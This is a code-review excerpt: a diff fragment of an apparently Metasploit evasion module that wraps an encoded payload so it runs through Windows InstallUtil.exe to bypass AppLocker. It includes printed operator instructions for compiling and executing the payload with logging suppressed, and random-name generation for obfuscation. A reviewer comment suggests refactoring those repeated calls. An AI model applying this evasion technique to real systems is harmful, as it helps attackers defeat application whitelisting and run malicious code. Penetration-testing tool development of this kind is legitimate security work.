modules/evasion/windows/applocker_evasion_install_util.rb

```diff
@@ -0,0 +1,121 @@
+    ])
+  end
+
+
+  def build_payload
+    esc = Rex::Text.encode_base64(payload.encoded)
+  end
+
+
+  def instructions
+    <<~HEREDOC
+
+        ___________________________________________________________________________________________________________________________________________
+       |                                                                                                                                           |
+       |                                                                Instructions                                                               |
+       |___________________________________________________________________________________________________________________________________________|
+       |                                                                                                                                           |
+       | 1.Copy #{datastore['FILENAME']} to the target and execute:                                                                                        |
+       | 2.x86{                                                                                                                                    |
+       |       Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']}                          |
+       |       Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe       |
+       |      }                                                                                                                                    |
+       |  x64{                                                                                                                                     |
+       |      Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']}                         |
+       |      Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe      |
+       |      }                                                                                                                                    |
+       |___________________________________________________________________________________________________________________________________________|
+    HEREDOC
+  end
+
+
+  def install_util
+    esc = build_payload
+    moda = Rex::Text.rand_text_alpha (3)
+    modb = Rex::Text.rand_text_alpha (3)
+    modc = Rex::Text.rand_text_alpha (3)
+    modd = Rex::Text.rand_text_alpha (3)
+    mode = Rex::Text.rand_text_alpha (3)
+    modf = Rex::Text.rand_text_alpha (3)
+    modg = Rex::Text.rand_text_alpha (3)
+    modh = Rex::Text.rand_text_alpha (3)
+    modi = Rex::Text.rand_text_alpha (3)
+    modj = Rex::Text.rand_text_alpha (3)
```

Comment:
This can probably be simplified better. Instead of having 9 different variables that call the same function, define a function (`modn()`?) that is just a wrapper for `Rex::Text.rand_text_alpha(3)`